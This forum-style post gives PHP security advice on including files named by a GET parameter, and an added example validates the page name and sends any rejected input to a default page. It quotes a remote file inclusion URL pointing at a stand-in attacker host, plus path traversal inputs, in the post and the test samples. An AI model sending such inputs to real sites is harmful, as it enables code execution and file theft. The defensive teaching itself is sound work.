Just a few security notes:
Always (and I mean always always, and not just sometimes always) hardcode a portion of the path to any include file that receives its pointer from the GET array. This is even more important now that PHP 4.3+ supports remote file streaming. Imagine I accessed your page and typed blat.php?page=http://mysite.hack/badbad.script - you would call that badbad.script and execute it on your server. Or ?page=../../hidden_files/pwd.txt - there are so many URL hacks that you should be aware of.
Now - if you had require('include_files/' .$_GET['page']. '.php'); the script would look for 'include_files/http://...... which wouldn't exist.
It's also an idea to set a default value if either $_GET['page'] is null or the file doesn't exist.
Code:
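// basename() drops any directory part (../) so the lookup stays inside include_files/
$page = 'include_files/' . basename(isset($_GET['page']) ? $_GET['page'] : 'default') . '.php';
// fall back to the default page when the requested file does not exist
require_once(file_exists($page) ? $page : 'include_files/default.php');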
Much more secure.
All that does is check whether a file exists in the include_files dir named $page.php - if it does it includes it - if it doesn't it includes default.php - so no matter what anyone types into the URL a page is always served and you know exactly what page too.
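
An added example, not part of the original post: one way to combine the hardcoded prefix, the default page and a check that the resolved file really sits directly inside include_files. The function name resolve_page() and the temporary directory layout are assumptions made for illustration.

```php
<?php
// Added example; resolve_page() and the demo layout are hypothetical.
function resolve_page($requested, $baseDir, $default = 'default')
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException("include directory missing: $baseDir");
    }
    // Accept only simple page names: no slashes, dots, scheme prefixes or NUL bytes.
    // is_string() also rejects ?page[]=x, which arrives as an array.
    if (!is_string($requested) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        $requested = $default;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    // realpath() resolves ".." and symlinks; the result must still sit directly in $base.
    if ($path === false || dirname($path) !== $base || !is_file($path)) {
        $path = $base . DIRECTORY_SEPARATOR . $default . '.php';
    }
    return $path;
}

// Constructed layout in a temp directory so the example runs offline.
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
@mkdir("$root/include_files", 0700, true);
@mkdir("$root/hidden_files", 0700, true);
file_put_contents("$root/include_files/default.php", "<?php echo 'default';");
file_put_contents("$root/include_files/news.php", "<?php echo 'news';");
file_put_contents("$root/hidden_files/pwd.php", "<?php echo 'secret';");

// Constructed inputs, including the two URLs quoted in the post.
$samples = array(
    'news',
    null,
    'http://mysite.hack/badbad.script',
    '../../hidden_files/pwd.txt',
    '../hidden_files/pwd',   // this file exists, so an existence check alone would not reject it
    array('news'),
    'missing',
);
foreach ($samples as $input) {
    $chosen = resolve_page($input, "$root/include_files");
    printf("%-40s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), basename($chosen));
}
```

Only the first sample resolves to news.php; every other input is served default.php.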